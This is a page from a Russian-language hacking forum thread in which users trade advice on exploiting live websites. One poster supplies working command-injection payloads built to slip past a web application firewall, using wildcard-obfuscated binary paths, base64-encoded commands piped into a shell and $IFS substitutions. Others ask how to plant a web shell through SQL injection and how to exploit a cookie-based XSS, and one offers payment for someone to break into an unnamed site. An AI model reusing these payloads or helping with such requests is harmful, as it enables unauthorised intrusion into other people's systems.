HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2591  
Старый 15.04.2019, 19:16
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию

Цитата:
Сообщение от man474019  
man474019 said:

hi all
os command injection in post data, mod_sec waf..when try echo test, it works
but when try uname, ls, pwd, dir waf deletes command, what real advice ?
Hi, try this:

Код:
Code:
/b?n/?s /
/b?n/un?m?
/?in/e??o "bHMgLWxh" | /?sr/b?n/b??e64 -d | /b?n/?h
 
Ответить с цитированием

  #2592  
Старый 16.04.2019, 17:08
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию

Цитата:
Сообщение от man474019  
man474019 said:

response
It seems that there are some unknown logic on backend, not traditional WAF. Try to fuzz and detect the white/black sequences and conduct the attack vector in accordance with the circumstances. For example:

Код:
Code:
;id;
`id`
;sleep 100;
`sleep 100`
uname${IFS}-a
echo$IFS"bHMgLWxh"|base64$IFS-d|sh
`echo$IFS"bHMgLWxh"|base64$IFS-d|sh>log.txt`

and so on...
Also check this.
 
Ответить с цитированием

  #2593  
Старый 16.04.2019, 19:19
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от man474019  
man474019 said:

@crlf
thank you for reply, I tried these variant for reading /etc/passwd, and now also tried your variants, but also WAF cuts functions (((
request
response
А ты чего ожидал от твоей команды ?
 
Ответить с цитированием

  #2594  
Старый 23.04.2019, 12:34
xmp
Guest
Сообщений: n/a
Провел на форуме:
4317

Репутация: 4
По умолчанию

Подскажите как загрузить шелл через SQLi

union based иньекция

FILE_PRIV = Y (5.5.60-log)

Включен --secure-file-priv соответственно into outfile не рабоатет.
 
Ответить с цитированием

  #2595  
Старый 23.04.2019, 16:04
xmp
Guest
Сообщений: n/a
Провел на форуме:
4317

Репутация: 4
По умолчанию

Цитата:
Сообщение от man474019  
man474019 said:

hi
see if magic_quotes_gpc ON or OFF
you must find writable path/folder to upload your shell
and also you can try LOAD DATA INFILE
Yes i can upload file data to table, but im looking for way write data to file.

magic_quotes_gpc = off
 
Ответить с цитированием

  #2596  
Старый 23.04.2019, 17:35
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от xmp  
xmp said:

Подскажите как загрузить шелл через SQLi
union based иньекция
FILE_PRIV = Y (5.5.60-log)
Включен --secure-file-priv соответственно into outfile не рабоатет.
попробуй переопределить, но скорее всего никак
 
Ответить с цитированием

  #2597  
Старый 23.04.2019, 17:57
xmp
Guest
Сообщений: n/a
Провел на форуме:
4317

Репутация: 4
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

попробуй переопределить, но скорее всего никак
Запись на включение находится в /etc/my.cnf

Верно понимаю что ты имеешь в виду?

Цитата:
Сообщение от None  
mysql>
SHOW VARIABLES LIKE "secure_file_priv";
+------------------+-----------------------+
| Variable_name | Value |
+------------------+-----------------------+
| secure_file_priv |
/var/lib/mysql-files/
|
 
Ответить с цитированием

  #2598  
Старый 23.04.2019, 18:05
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от xmp  
xmp said:

Запись на включение находится в /etc/my.cnf
Верно понимаю что ты имеешь в виду?
https://bugs.mysql.com/bug.php?id=50373
 
Ответить с цитированием

  #2599  
Старый 30.04.2019, 20:14
WallHack
Guest
Сообщений: n/a
Провел на форуме:
61136

Репутация: 32
По умолчанию

Есть уязвимость, Cross site scripting в куках

GET site/eta.php HTTP/1.1

Referer: https://www.google.com/

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/45.0.2228.0 Safari/537.21

Cookie: cache=Cross site scripting


Есть пример эксплуатации такой уязвимости ?
 
Ответить с цитированием

  #2600  
Старый 30.04.2019, 22:50
vladF
Guest
Сообщений: n/a
Провел на форуме:
6200

Репутация: 0
По умолчанию

Может ли кто попробовать раскрутить уязвимость руками, в sqlmap никак не идет, но думаю надо руками. Сайт скину в личку. На пиво скину)
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ